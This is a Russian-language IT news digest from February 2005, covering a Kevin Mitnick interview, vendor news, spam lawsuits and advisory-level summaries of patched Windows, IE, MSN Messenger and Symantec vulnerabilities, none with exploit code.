Москву посетил Кевин Митник, в прошлом — самый известный хакер мира, а ныне — консультант по безопасности различных корпораций, соучредитель и генеральный директор консалтинговой компании Mitnick Security Consulting. Бывший «гуру взлома» поделился с корреспондентом CNews своими взглядами на угрозы, связанные с социальной инженерией — высокоэффективным типом атак, использующим человеческий фактор как самый уязвимый компонент корпоративных систем безопасности. «Раньше у меня не было никаких табу, кроме одного: взламывая компьютерные системы, я никогда не делал этого в отношении людей, которых я знал, — признался г-н Митник. — Но уже давно я не позволяю себе никаких поступков, связанных с несанкционированным доступом к информации, потому что один раз за это уже поплатился». Впрочем, отвечая на вопрос CNews о том, действительно ли он может взломать любую компьютерную сеть, г-н Митник поинтересовался: «А какой у вас IP-адрес?» В детстве Кевин мечтал стать врачом, ветеринаром или адвокатом. Но жизнь сложилась иначе. Митник увлекся компьютерными технологиями и уже в 16 лет произвел первый несанкционированный доступ. Впрочем, он рассказал, что если бы не стал хакером, то все равно связал бы свою жизнь с компьютерами, окончил бы школу, институт и стал бы заниматься вопросами компьютерной безопасности и администрирования. «Когда я скрывался от правосудия, я нанимался в различные компьютерные компании как раз по этому профилю — правда, не под своим именем», — рассказал он. Митника посадили в тюрьму, надолго запретив не только выход в интернет, но и пользование компьютером. «На самом деле, вскоре компьютером пользоваться разрешили при условии, что я не расскажу об этом прессе, — признался он. — Я не пользовался компьютером меньше, чем вы думаете, но выхода в интернет у меня не было. Но когда мне разрешили выйти в интернет, первым сайтом стал сайт моей подруги, что неудивительно: все происходило под вниманием телекамер и, если бы я вышел куда-то не туда, у меня были бы серьезные проблемы».
Интервью с Митником

13/02/2005 13:05 НР и Intel налегают на Oracle в вопросе о двойном лицензировании
Oracle считает, что каждое из двух ядер процессора эквивалентно отдельному ЦП, и на каждое ядро требуется лицензия. НР и Intel с этим не согласны. Развивая свои стратегии сдвоенных процессоров, Intel и НР навалились на общего противника, в котором видят помеху для осуществления своих двухъядерных амбиций: гиганта СУБД Oracle. Во втором квартале Intel планирует выпустить свой первый сдвоенный процессор в форме Pentium Processor Extreme Edition. За ним последует Montecito, двухъядерная версия серверного чипа Itanium, а после и многоядерные версии «пентиумов», «ксеонов» и «итаниумов», несущих в себе до 32 ядер. Но производители аппаратуры обеспокоены тем, что традиционные модели лицензий на программное обеспечение станут тормозить распространение многоядерных конструкций. Проблема в том, что чем больше логических процессоров будет встроено в каждый чип, тем дороже обойдутся лицензии на ПО, — вне всякой связи со стоимостью оборудования. «Пожалуй, хуже всего дела обстоят с Oracle, — сказал в четверг на брифинге с журналистами менеджер по маркетингу корпоративных продуктов Intel Шаннон Поулин. — Они считают лицензии по числу ядер, а мы пытаемся заставить их взглянуть на вещи нашими глазами». НР, которая с самого начала участвовала в разработке процессора Itanium и недавно передала Intel 250 разработчиков процессора, тоже давит на Oracle, сказал директор НР по ответственным бизнес-системам Питер Крафт. «Мы дважды в год проводим конференции для крупнейших заказчиков, — сказал он — Они длятся почти неделю, и мы приглашаем на них людей из Intel, Oracle и т. п. На каждом таком совещании Oracle задают вопрос: „Когда вы измените схему лицензирования?”». В адрес Oracle раздаются не только общие призывы к виртуализации. Вызывает беспокойство и стратегия компании по отношению к многоядерным процессорам. «Процессор перестал быть неделимым элементом. Мир меняется, и Oracle должна меняться вместе с ним», — сказал Крафт, который уверен, что со временем Oracle пересмотрит свою лицензионную схему.
ZDNet

12/02/2005 19:05 Графический интерфейс для работы с FreeBSD портами
Стартовал процесс разработки системы FreePort - GUI интерфейса для управления FreeBSD портами, подобного системе Synaptic, cообщает opennet.ru. Задача FreePort, в два клика обеспечить выполнение не только операций по установке и обновлению портов, но выполнять наложение security патчей и обновление всей системы. Необходимо заметить, что основная часть администраторов FreeBSD вряд ли станет ставить на серверы X-Window только для того, чтобы использовать GUI для работы с портами, ибо вполне нормально себя чувствует в консоли. Но, возможно, проект найдёт своих поклонников среди пользователей десктоп-систем.
Cайт проекта

12/02/2005 18:53 Обнаружена первая шпионская программа для браузера Mozilla
Основатель компании Sunbelt Software Сту Сьюверман (Stu Sjouwerman) объявил об обнаружении первой шпионской программы, созданной для слежки за пользователями веб-браузера Mozilla. Конкуренты Sunbelt Software — Webroot Software — считают, что говорить о написании шпионской программы специально для Mozilla преждевременно. «Согласно данным моих исследователей, шпионская программа работает с браузером Mozilla, но это не значит, что она создана специально для продуктов Firefox. Впрочем, обнаружение шпионской программы для Firefox — вопрос времени», — заявил сайту News.com вице-президент Webroot Software Ричард Стьеннон (Richard Stiennon). Шпионская программа устанавливается только с подтверждения пользователя. Многие пользователи дают такое подтверждение, поскольку диалоговое окно браузера не дает никаких предупреждений о вредоносном характере программы. «Устанавливая программу, пользователи могут не понять, что имеют дело с установкой. Это еще не полноценный шпионский код, но совершенно отчетливо видно, с какой целью он создавался», — рассказал Сьюверман. Эксперты полагают, что интерес хакеров к браузерам типа Mozilla растет вместе с расширением их доли на рынке. В прошлом году доля Mozilla возросла с 2,4% до 7,4% от общего объема рынка браузеров. Firefox заявляет, что к концу 2005 года намеревается увеличить долю своих программ до 10%. Сьюверман считает, что появление шпионского софта для продуктов Firefox — неизбежно, поскольку сейчас хакеры активно ищут бреши в системах безопасности браузеров с открытым исходным кодом. «Есть небольшая армия программистов-злоумышленников, которая разрывает Firefox на части», — заявил Сьюверман. «Трудно точно прогнозировать, в какой форме будет существовать шпионский софт для Firefox. Это зависит от того, какие бреши будут найдены в браузере, и как быстро их удастся закрыть», — считает главный технический консультант компании Sophos Грэхем Клюли (Graham Cluley). По словам одного из разработчиков Mozilla Дэвида МакГиннеса (David McGuinness), Firefox защищает пользователей от шпионского софта с помощью желтой индикаторной панели. Она информирует пользователей об установках программ, находящихся на ресурсах, отличных от Update.mozilla.org. Вместе с тем МакГиннес признал, что защитить Mozilla от скрытой установки пока проблематично.
Подробности

12/02/2005 15:43 Подробности уязвимости Windows при обработке SMB-пакетов
Cтали известны также некоторые подробности уязвимости в ОС Windows при обработке SMB-пакетов. Уязвимость существует при обработке SMB-трафика и может быть реализована посредством переполнения буфера в SMB и CIFS. Драйвер MRXSMB.SYS отвечает за проведение операций SMB клиента и за обработку запросов, полученных от SMB сервера. Некоторые важные операции, связанные с предоставлением сетевого доступа и все RPC-over-named-pipes используют команды Trans (25h) и Trans2 (32h). Злонамеренный SMB может послать клиенту специально сформированные транзакционные данные, что приведет к переполнению буфера. Удаленный атакующие может создать Trans2 FIND_FIRST2 пакет, в которых длина полей для имени файла и его короткого имени будет слишком большой. Удаленный атакующий сможет создать специально сформированные 'file://' ссылки, при нажатии на которые будет выполнен произвольный код на уязвимой системе. Патчи для устранения уязвимости описаны в бюллетене MS05-011.
Подробности

12/02/2005 15:30 Описание уязвимостей в Internet Explorer
Andreas Sandblad из Secunia посвятил секьюрити-сообщество в суть уязвимостей, обнаруженных в Internet Explorer и спешно залатанных Microsoft патчем, описанным в MS05-014. Подобных уязвимостей обнаружено 4. Первая связана с некорректной обработкой HTTP-заголовка "Content-Disposition", вторая - с некорректной обработкой перкрёстных ссылок в зонах безопасности IE, третья - с некорректной обработкой данных в папке "Temporary Internet Files", ну и, наконец, четвёртая - с ошибкой в обработке атрибута "codebase" тега "object".
Подробное описание уязвимостей

12/02/2005 14:56 Обнаружен свежий эксплойт для Media Player
Спустя всего пару дней после того, как Microsoft выпустила свой последний февральский набор заплаток, в интернете появился эксплойт одной из залатанной уязвимости. В минувший четверг Microsoft выпустила заплатку для уязвимости, которой были подвержены Media Player и MSN Messenger, напоминает PC Pro. Уязвимостью можно было воспользоваться, «скормив» программа специально составленные PNG-файл изображения. Представители Microsoft заявили, что пока серьезных атак, использующих описанную уязвимость, зафиксировано не было. Все, кто скачал и установил последние обновления с заплатками находятся в безопасности.
"Вебпланета"

12/02/2005 14:19 Microsoft вновь утверждает, что Windows безопаснее Linux
Майк Нэш (Mike Nash), главный ответственный за безопасность в корпорации Microsoft, утверждает, что Windows безопаснее Linux, сообщает Nixp.Ru. Во время беседы, состоявшейся через несколько дней после того, как Microsoft выпустила крупнейшую партию патчей для Windows с апреля 2004 года, Нэш упорно защищал прогресс разработчиков и сравнил число уязвимостей, найденных в Windows, с их количеством для Linux-дистрибутивов от Red Hat и Novell. «Даже с таким относительно большим числом бюллетеней, что было нами обнародовано на этой неделе, мы остаемся в выигрыше, — пояснил он. — В 2005 году (до сегодняшнего дня) Microsoft устранила 15 уязвимостей в Windows Server 2003. За тот же период пользователям Red Hat Enterprise Linux 3 пришлось установить 34 патча, а SuSE Enterprise Linux 9 — 78 заплаток». Нэш также заявил, что число патчей — это не единственный критерий, по которому пользователям следует судить о том, как Microsoft выполняет свою работу: «Обратите внимание, что это не единственный показатель, он не включает в себя множество других вещей, над которыми мы работаем: руководство безопасностью для заказчиков, улучшение управляемости безопасностью и представление инновационных решений и технологий в сфере безопасности».
Источник

12/02/2005 14:02 В Рунете появилась онлайн-игра по мотивам "Ночного дозора"
Онлайн игра "Дозоры. Гроза в Сумраке", тестирование которой началось 9 февраля, относится к классу многопользовательских Интернет ролевых игр, так называемых BBMMORPG (Browser Based Massively Multiplayer Online Role Playing Game). Доступ к игре не требует дополнительного программного обеспечения, кроме браузера и подключения к Интернету. Игровым пространством является виртуальный мир Москвы Иной, повторяющий центр современной Москвы. События игры происходят на улицах, во дворах домов, станциях метро, магазинах, банках, гостиницах, и прочих локациях города, идентичных реальным. В игре существуют только Иные, Светлые и Темные. Персонажей людей - нет. Каждому игроку принадлежит не более одного персонажа: ведьмы или колдуна, вампира или оборотня, мага, суккуба или инкуба. Чтобы повлиять на победу сил Света или Тьмы, нужно развивать персонажа, повышать его силу, опыт, удачу, здоровье, быстроту, концентрацию. Все это происходит в современном мире, поэтому персонажу необходимо жить, зарабатывать деньги, чтобы покупать предметы, оружие, магические артефакты, и просто оплачивать проезд на городском транспорте. Как и следует из названия, центром игры являются организации Ночной Дозор, Дневной Дозор, а также Инквизиция. Каждый игрок тем или иным образом будет находиться под влиянием работы этих служб, даже если сам будет вольным Иным или создаст другую организацию: секту или братство. Но служба в Дозоре, а тем более в Инквизиции является почетной обязанностью и привилегией. Стать членом этих организаций совсем не просто. Это надо заслужить. Иногда проще создать свою секту и получить преимущество магического тотема секты, силы командного боя.
Сайт игры

12/02/2005 12:49 Новая версия антивируса Panda Antivirus для дома
Компания Panda Software начала поставки на российский рынок обновленного антивируса для домашних пользователей Panda Titanium Antivirus 2005. В новую версию продукта включен встроенный брандмауэр, предотвращающая атаки хакеров, а также защита личных данных, блокирующая программы-шпионы и дозвонщики. Titanium Antivirus 2005 автоматически определяет и удаляет все типы вирусов, червей и троянов, а также автоматически восстанавливает нанесенные вирусами повреждения в операционной системе. Кроме того, включение технологий TruPrevent обеспечивает защиту от неизвестных вредоносных кодов на основе анализа поведения программ. Panda Titanium Antivirus 2005 автоматически обновляется каждый раз при подключении к интернету. При каждый раз скачиваются признаки только новых вирусов. В ближайшее время компания планирует представить еще один новый антивирусный продукт, предназначенный для бизнеса - Panda Platinum Internet Security 2005. Это решение защищает ПК от всех типов вирусов, атак хакеров, спама, программ-шпионов, дозвонщиков других угроз и имеет даже функцию веб-фильтрации.
Сайт антивируса

12/02/2005 12:21 Корпорация Intel нашла замену кремнию в процессорах
Транзисторы на основе антимонида индия, разработанные сотрудниками Intel и Qinetiq, смогут в ближайшем будущем вытеснить кремниевые, которые используются при производстве процессоров сейчас. Об этом было заявлено в совместном пресс-релизе. В течение последних двадцати лет инженеры непрерывно уменьшали транзисторы и увеличивали их число, что служило главным источником дополнительных мега- и гигагерц. Однако нежелательные квантовые и термодинамические эффекты рано или поздно заставят убывающую последовательность размеров оборваться. По мнению некоторых специалистов, предельная для кремния величина будет достигнута довольно скоро. Альтернативный материал искали среди полупроводников и производных нанотрубок. Антимонид индия InSb, двухкомпонентный полупроводник, начали исследовать около двух лет назад. Эффект квантовой "потенциальной ямы" позволил в несколько раз снизить время и напряжение, необходимые для переключения содержащего InSb транзистора. Благодаря этому "разогрев" новых процессоров будет небольшим. Опытные образцы потребляют в десять раз меньше энергии, чем кремниевые аналоги. К сожалению, пока для нормальной работы антимонид-индиевых транзисторов необходимы температуры не выше точки кипения жидкого азота, равной -196 градусам Цельсия. Серийный выпуск процессоров нового поколения Intel планирует начать в следующем десятилетии, а примерно через 15 лет "кремний" сойдет со сцены.
Пресс-релиз

11/02/2005 14:22 Бин Ладен оставил след на сайте ФСБ
32-летнему челябинцу, состоящему на учете в психоневрологическом диспансере, удалось разместить на сайте ФСБ России информацию о новых готовящихся терактах в США. Как передает "УралПолит.Ru", инцидент произошел еще в декабре прошлого года. Молодой человек выдавал себя за террориста Усаму бен Ладена. Установить компьютерного хулигана удалось за четыре часа благодаря интернет-провайдерам, которые выяснили, что сообщение поступило из Челябинска. Как было установлено в результате расследования, южноуральский "бен Ладен" стоит на учете в психдиспансере с диагнозом "шизофрения в легкой степени". Решено передать расследование дела в милицию, которая в ближайшее время рассмотрит вопрос о возбуждении уголовного дела по статье 207 УК РФ "Заведомо ложное сообщение об акте терроризма"
Источник

11/02/2005 13:58 Анонс конкурса на логотип FreeBSD оказался преждевременным
На сайте конкурса на логотип для FreeBSD опубликовано объявление, cообщаетNixp.Ru: «Это сайт будущего конкурса на лучший логотип для FreeBSD, целью которого ставится создание нового логотипа проекта FreeBSD в дополнение к существующему талисману — Beastie. Несмотря на состоявшийся преждевременный анонс, мы пока не готовы принимать логотипы. Пожалуйста, следите за этим сайтом и за списком рассылки freebsd-announce для получения информации, которая появится в ближайшее время».
Сайт проекта

11/02/2005 12:54 Поддержка виртуализации на уровне ядра
По сообщению координатора разработки ядра Linux 2.6 Эндрю Мортона, в одну из последующих версий планируется встроить механизм виртуализации, создаваемый ныне в рамках проекта с открытым кодом Xen. Мортон не исключает, что технология появится в составе ядра Linux еще до конца этого года. Чтобы воспользоваться Xen в ее нынешнем виде, необходимо установить специальную заплату для ядра, что в случае использования коммерческого дистрибутива приведет к потере его поддержки со стороны производителя. В настоящее время Xen не позволяет устанавливать на виртуальные машины Windows в качестве гостевой ОС, но в дальнейшем такую возможность планируется реализовать, воспользовавшись специальным расширением набора команд процессоров Intel, работа над которым сейчас завершается в корпорации. По сообщению представителей Red Hat и Novell, в этих компаниях планируют включить механизм виртуализации в состав их дистрибутивов Linux, и Xen рассматривается как один из возможных кандидатов. В проекте Xen принимают участие разработчики из Hewlett-Packard, Intel и IBM.
"Открытые системы"

11/02/2005 12:18 Yahoo выпустила панель инструментов для браузера Firefox
Компания Yahoo объявила о выпуске бета-версии инструментальной панели Yahoo Toolbar для браузера Firefox. Панель позволяет осуществлять быстрый поиск информации во Всемирной сети или внутри текущего ресурса без необходимости загрузки основного сайта поисковой системы. Для поиска информации, естественно, используется сервис Yahoo Search. Запросы вводятся в соответствующее окошко, расположенное непосредственно на панели. Кроме того, пользователи одним щелчком мыши могут получить доступ к новостям, финансовым сводкам, прогнозам погоды или любой другой интересующей их информации. Панель позволяет создавать новые закладки, кнопки быстрого запуска, просматривать историю поиска и работать с каналами RSS. Помимо этого, инструментальная панель автоматически оповещает о получении новых электронных сообщений (почтовый аккаунт должен быть зарегистрирован в системе Yahoo Mail). Наконец, возможен быстрый перевод онлайновых страниц через сервис Babelfish. В настоящее время для загрузки доступна лишь модификация тулбара, поддерживающая операционные системы Microsoft Windows. В перспективе Yahoo намерена представить аналогичные инструментальные панели для Linux и Mac OS, а также реализовать функцию защиты от шпионских программ. Дополнительную инструментальную панель для браузера Firefox предлагает также принадлежащий компании Amazon поисковик А9. Вероятнее всего, аналогичное решение в ближайшее время выпустит и Google, недавно принявшая на работу двух ведущих разработчиков браузера Firefox. До последнего времени панели инструментов выпускались преимущественно для Internet Explorer, однако рост популярности Firefox заставил поставщиков альтернативных тулбаров заняться и этим браузером.
Страница загрузки

11/02/2005 11:09 Microsoft и фармацевтическая компания Pfizer нанесли новый удар по спамерам
Софтверная компания Microsoft и один из крупнейших производителей лекарств компания Pfizer совместно подали 17 исков в различные суды Нью-Йорка против компаний, занимающихся онлайновой торговлей нелегальными лекарственными препаратами (в частности, поддельным половым стимулятором "Виагра") и рекламирующих свои услуги при помощи спама, сообщает газета Washington Post. Услуги подпольных интернет-аптек широко рекламируются в спаме, рассылаемом адресатам по всему миру. Спамерские письма гласят, что ассортимент таких магазинах полностью легитимен, но их цены гораздо дешевле, чем цены в настоящих аптеках. В письмах содержатся ссылки на сайты, которые выполнены на профессиональном уровне и могут вводить этим пользователя в заблуждение, однако на самом деле продаваемый ими товар является контрафактным. Как ранее сообщалось, в настоящее время несколько крупнейших высокотехнологичных компаний США вместе с властями этой страны проводят организованную кампанию против спамеров, последовательно подавая серии исков в американские суды против спамерских контор, используя вступивший год назад в силу закон "CAN-SPAM Act", регулирующий применение массовых рассылок американскими организациями. Как правило, суды принимают решение в пользу истцов, приговаривая ответчиков к очень большим штрафам (до миллиарда долларов) или к значительным срокам тюремного заключения (до 9 лет). Как правило, за этим следует закрытие рассылающих спам фирм.
Lenta.Ru

11/02/2005 10:29 Найдена шпионская программа, уничтожающая средство Microsoft для уничтожения шпионских программ
Специалисты антивирусной компании Sophos обнаружили новую вредоносную программу, которая пытается нейтрализовать выпущенное месяц назад корпорацией Microsoft средство для поиска "шпионских программ" Microsoft AntiSpyware. Как сообщает издание IDG News Service, программа получила классификационное название BankAsh-A. О методах, которые авторы программы применили для ее распространения, не уточняется, однако отмечается, что случаев поражения ей отмечено лишь несколько. Тем не менее, специалисты опасаются, что скорость реакции вирусописателей позволяет предположить, что в дальнейшем может появиться много новых подобных программ и вирусов. BankAsh-A ищет на пораженном компьютере Microsoft AntiSpyware, выводит ее из рабочего состояния, если она запущена, после чего стирает ее файлы. Кроме того, BankAsh-A пытается украсть с компьютера пользователя данные о банковских счетах в нескольких банках Великобритании - это может означать, что программа создана именно в этой стране. Как сообщалось, Microsoft AntiSpyware стала первой программой такого рода, выпущенной корпорацией Microsoft. Ранее она не занималась созданием антивирусного и антишпионского ПО, однако в последнее время ей были куплены две компании этого профиля и аналитики полагают, что Microsoft собирается составить конкуренцию лидерам антивирусной индустрии. В настоящее время Microsoft AntiSpyware представлена в бета-версии и для того, чтобы ее скачать, необходимо пройти процедуру проверки подлинности используемой копии Windows. Помимо AntiSpyware представлена также программа Malicious Software Removal Tool, которая занимается поиском и удалением наиболее распространенных вирусов и "червей".
Подробности

10/02/2005 20:43 Cпециалисты IBM: вирусы и компьютерная преступность скоро выйдут за пределы компьютеров
Согласно прогнозам специалистов IBM, в скором будущем вирусы и компьютерная преступность в ее разнообразных формах «выплеснется» за пределы собственно компьютеров. По мере проникновения цифровых устройств в нашу жизнь жертвами сетевых преступников станут, например, системы управления двигателями автомобилей и телефонная связь. В аналитическом исследовании, проведенном службой безопасности (Security Intelligence Services) компании IBM, использовались данные, полученные из различных источников — от крупнейших корпоративных клиентов компании до статистических показателей правительственных организаций. Помимо этого, учитывались результаты наблюдений более чем 2 тыс. консультантов «голубого гиганта» в области безопасности. В исследовании обобщены данные по полумиллиону различных компьютерных устройств. Все это в совокупности позволило получить представление о развитии угроз компьютерной безопасности на протяжении 2004 года, а также о наиболее вероятных тенденциях и сценариях дальнейшего развития ситуации. Картина получается весьма тревожная. Вирусы вслед за обычными компьютерами начинают осваивать мобильные телефоны, различные портативные устройства, беспроводные сети и даже автомобильные компьютеры, которые все чаще берут на себя управление основными параметрами автомобиля. Все большую роль в сложившихся условиях приобретает «человеческий фактор» — готовность всех и каждого противостоять угрозе.
Подробности

10/02/2005 16:19 Мобильный спам глобализируется
Спам активно проникает в повседневную жизнь абонентов мобильной связи: с ним сталкивались около 80% владельцев сотовых телефонов во всем мире. Эти данные были получены в ходе исследования, проведенного группой экспертов из университета Сент-Галлена (Швейцария) и компании Intrado — поставщика систем связи в чрезвычайных ситуациях, в сотрудничестве с международным телекоммуникационным союзом ITU (International Telecommunication Union). Как сообщает Mobilepipeline, в нем приняли участие 1659 владельцев мобильников и 154 оператора беспроводной связи. Полученная информация вряд ли порадует операторов мобильной связи — большинство пользователей винят во всем именно их. Более того, выяснилось, что клиенты мобильных сетей в попытке избавиться от спама склонны менять компанию-оператора, а не просто телефонный номер. И пользователи, и поставщики услуг полагают, что в будущем острота проблемы, связанной с мобильным спамом, возрастет. Около 83% опрошенных представителей телекоммуникационной сферы полагают, что мобильный спам превратится в проблему первостепенной важности уже в ближайшие пару лет. И клиенты мобильных сетей, и представители промышленности солидарны во мнении о том, что наилучшим способом решения проблемы явились бы меры по борьбе со спамом, предпринятые самими операторами мобильных сетей. Результаты исследования показывают, что поиск таких мер уже ведется — пока что, правда, методом проб и ошибок.
Подробнее

10/02/2005 15:32 ПО Symantec содержит лазейку для вирусов
В 29 продуктах компании Symantec, одного из ведущих мировых производителей ПО для обеспечения информационной безопасности, была обнаружена уязвимость, способствовавшая исполнению вредоносного кода. В число уязвимых программ попали Norton SystemWorks 2004 и Symantec Mail Security for Exchange. Уязвимость, содержащаяся в модуле DEC2EXE антивирусной библиотеки Symantec, была обнаружена специалистами компании Internet Security Systems (ISS). Этот модуль является частью механизма сканирования файлов, он позволяет анализировать исполнимый код, сжатый в формате UPX (Ultimate Packer for eXecutables). Удаленный пользователь может создать специальным образом UPX-файл, вызвать переполнение буфера и выполнить произвольный код на уязвимой системе. Антивирусная библиотека Symantec используется в основных антивирусных и антиспамовых продуктах компании, таких, как Brightmail и Symantec Web Security, для различных платформ. Symantec предупредила общественность об обнаруженной проблеме и выпустила программную заплату, позволяющую её ликвидировать. «Воздействие этой уязвимости усиливается из-за того, что большое количество почтовых и иных транспортных шлюзов используют утилиты сканирования файлов с применением уязвимой библиотеки, — говорится в заявлении компании. — Потенциально это позволяет хакерам эксплуатировать системы фильтрации вредоносного кода и расширяет их доступ к внутренним сетям». Уязвимости подвержены компьютеры, выполняющие под управлением операционных систем Microsoft Windows, Mac OS X, Linux, Solaris и AIX необновлённые версии программ Symantec. Как отмечается, уязвимость не встречается в последних версиях некоторых продуктов, например, в Norton Antivirus 2005. «Symantec настоятельно рекомендует своим клиентам убедиться, что их программы обновлены для защиты от этой уязвимости, — говорится в заявлении компании. — На данный момент компании ничего не известно о случаях её использования».
CNews

10/02/2005 12:28 FCC запретила спамерам рассылать письма на ряд доменов
В рамках борьбы со спамерами, которые уже добрались до мобильных телефонов и пейджеров, 7 февраля на официальном сайте Федеральной комиссии США по связи (FCC) был опубликован список доменных имен, на которые строго запрещается посылать спам, сообщает PC World. В сообщении комиссии подчеркивается, что нижеследующий список содержит в себе перечень доменных имен, предоставленных беспроводным операторам связи, и на эти адреса строго запрещено посылать письма рекламного характера. Все перечисленные сайты несут на себе функцию рассылки элктронной корреспонденции на мобильные устройства, а с полным списком можно ознакомиться здесь. Что касается наказания, которое, безусловно, предусмотрено для тех, кто нарушит данное положение, то оно выражается в денежном штрафе, который составляет 11 тысяч долларов США. Дополнительная мера воздействия на спамеров была принята вследствие того, что принятый в 2003 году антиспамерский закон CAN SPAM, не возымел на спамеров практически никакого сдерживающего эффекта, и по прошествии года число невостребованных рекламных рассылок не только не сократилось, но даже увеличилось в несколько раз.
Подробности

10/02/2005 10:46 Open Source Forum Russia: подробности
Как уже сообщалось ранее, в конце апреля этого года в Москве, в отеле Radisson SAS Hotel, пройдет конференция Open Source Forum Russia. Ее участниками будут представители крупнейших Linux-компаний: Red Hat (Мэттью Сцулик, президент), IBM, Novell (Рихард Зейбт, президент Novell в Европе, Африке и Ближнем Востоке, ранее - глава SUSE Linux AG), Mandrakesoft (Франсуа Бансилон, президент), MySQL (Дэвид Экмарк, один из основателей), Trolltech (Матиас Эттрих) и других, а также "светила" мира open-source: создатель Perl Ларри Уолл, исполнительный директор Linux Int. Джон "Мэддог" Холл и сотрудники Министерств РФ. В ходе мероприятия будет организована демонстрация "Linux City" - мини-города, инфраструктура которого базируется на открытых технологиях, а также проведена выставка и тематические круглые столы.
Подробности

10/02/2005 10:13 Судья отругал SCO за отсутствие улик против IBM
Федеральный судья, рассматривающий иск SCO Group против IBM по поводу Unix и Linux, отверг попытку IBM отмести обвинения, но своим заключением дал повод считать дело SCO бесперспективным. В 2004 году IBM подала ходатайство, в котором утверждает, что ее работа над Linux не нарушает авторских прав на Unix, якобы принадлежащих SCO, и просит вынести частичное решение в порядке упрощенного судопроизводства. В среду окружной судья Дейл Кимболл не удовлетворил этого ходатайства IBM, однако высказал резкую критику в адрес SCO за непредставление доказательств по своему делу. «Несмотря на гигантское несоответствие между публичными обвинениями SCO и ее фактическими свидетельствами — вернее, полным отсутствием таковых, — и с учетом соблазна удовлетворить ходатайство IBM суд постановил, что выносить частичное решение в порядке упрощенного судопроизводства было бы преждевременным, — пишет Кимболл. — На фоне публичных заявлений SCO относительно нарушения IBM и другими предполагаемых авторских прав SCO на программное обеспечение Unix представляется возмутительным, что SCO не представила никаких убедительных свидетельств, позволяющих решить спорный вопрос о нарушении IBM предполагаемых авторских прав SCO в ходе работы IBM над Linux». Специалисты по интеллектуальной собственности согласны в том, что это заключение не предвещает SCO ничего хорошего. «Судя по формулировкам заключения, похоже, что в этом раунде SCO вряд ли увернется от нокаута, — сказал адвокат Carr & Ferrell Джон Феррелл. — Мало что может сравниться по разрушительной силе для вашего дела, чем рассерженный федеральный судья». «Пусть IBM еще не победила, но это постановление не оставляет сомнений в том, что SCO потерпит очередное поражение. Судья нарисовал зловещую картину для SCO», — добавил Аллонн Леви из юридической фирмы Hopkins and Carley. Проблема авторских прав является центральной для успеха $5-млрд иска SCO, потрясшего компьютерную индустрию в 2003 году. SCO утверждает, что IBM нарушила свой контракт с компанией, использовав проприетарную технологию Unix в операционной системе с открытым исходным кодом Linux.
ZDNet

10/02/2005 09:43 Игровая компания Tecmo подала в суд на участников хакерского форума
Американское подразделение японской компании Tecmo, которая выпускает компьютерные игры для телеприставки X-Box, подало в федеральный суд города Чикаго иск против сайта, на котором работает форум, посвященный несанкционированному взлому игровой продукции, сообщает Reuters. В качестве ответчиков указываются два хозяина сайта и форума, а также авторы размещенных в форуме сообщений. Они обвиняются в распространении информации о том, как незаконно взламывать игры, произведенные компанией, изменяя их код. Это, по заявлению истца, является нарушением "Закона об авторском праве в цифровом тысячелетии" (DMCA), регулирующего охрану авторских прав, в частности, в рамках Интернета. Среди продуктов Tecmo, которые обсуждались на форуме - игры "Ninja Gaiden" и "Dead or Alive". Агентству Reuters не удалось связаться с владельцами сайта. Название сайта и его адрес не уточняются.
lenta.Ru

9/02/2005 16:10 Уязвимость в Internet Explorer
Опубликование деталей уязвимостей в Windows продолжается. Известный финский исследователь компьютерной безопасности (в отличие от "полковника Платонова из управления "К", рассказывающего сказки журналистам) посвятил в детали уязвимости, обнаруженной в Internet Explorer. Как пишет автор, обнаружена уязвимость в механизме обработки URL, позволяющая удалённому атакующему обмануть технологию безопасности этого, без всякого сомнения, "безопасного" браузера, в результате чего последний будет считать, что страница из Интернет загружена из зоны безопасности "My Computer". JavaScript в подобной странице способна будет выполнить произвольный код в системе с привилегиями счастливого пользователя, который работает в IE в Интернет. Уязвимость связана с обработкой URL, которые кодируются в 16-ричном кода (HEX - он же %xy). В отличие от остальных ОС, Windows позволяет кодировать подобным образом имена хостов в URL, что позволяет из-за ошибки в программе декодирования задать в URL IP-адрес атакующего.
Описание

9/02/2005 15:52 Уязвимость в обработке PNG-файлов в MSN Messenger
После выхода пачки обновлений от M$ не заставили себя ждать описания уязвимостей, которые исследователи, следуя принятой в обществе White Hat традиции публикуют после опубликования сообщений о патчах. Core Security Technologies сообщает об обнаружении уязвимости в MSN Messenger, которым Майкрософт упорно кормит пользователей каждой версии Windows. Уязвимость связана с ошибкой при разборе файла в формате PNG, которым могут обмениваться пользователи, принявшие этот IM в качестве клиента для общения (IM). В результате ошибки возникает возможность выполнить код (удалённо, разумееется) на машине жертвы с привилегиями пользователя, запустившего MSN Messenger. AtmacaSoft Inc. выпущен эксплоит, позволяющий создать PNG-файл, который позволяет ломать удалённые машины.
Описание
Эксплоит

9/02/2005 15:36 А управление "К" не дремлет!
Тем временем, пока передовое интернет-секьюрити-сообщество сообщает об обнаружении уязвимостей в сами_знаете_какой операционной системе, доблестное управление "К" ("самое засекреченное", по словам журналиста) занимается рутиной оперативно-разыскной деятельности, одним из аспектов которой является рассказывание басней журналистам в лице Тимофея Борисова из "Россиской газеты" (на совести которого остаётся сам заголовок статьи - "ХАКЕРЫ ОСТАНОВИЛИ СЕРДЦЕ" - предлагаю автору продолжение - "ХАКЕРЫ ОСТАНОВИЛИ СОЛНЦЕ") о возможности остановки сердца через Интернет и разоблачении сети "Аль-Каеды" в Барнауле ("Был вычислен не только институт, но аудитория и компьютер, с которого отправилось письмо. И все это, заметьте, в течение одних суток"). Интервью довольно занятное и небезынтересное для пытливого ума.
Интервью

9/02/2005 14:10 За компьютер клиента ответит банк?
Бизнесмен из Майами подал иск против Bank of America, cообщает bugtraq.ru. Данный клиент пользовался системой удаленного управления своим счетом в Bank of America, а ушлые ребята, личности которых не установлены, пользовались удаленным доступом к компьютеру бизнесмена, зараженному вредоносной программой coreflood. В результате более 90 тысяч долларов перекочевали со счета бизнесмена в Парекс-банк. Суть претензии бизнесмена заключается в том, что "банк проявил халатность и не защитил клиента от рисков онлайнового банкинга". Если суд решит дело в пользу клиента, то в условиях прецедентного права в США перспективы вырисовываются не радужные.
Подробности

9/02/2005 12:51 Создатель Java: Microsoft делает большую ошибку, строя .NET на базе С и С++
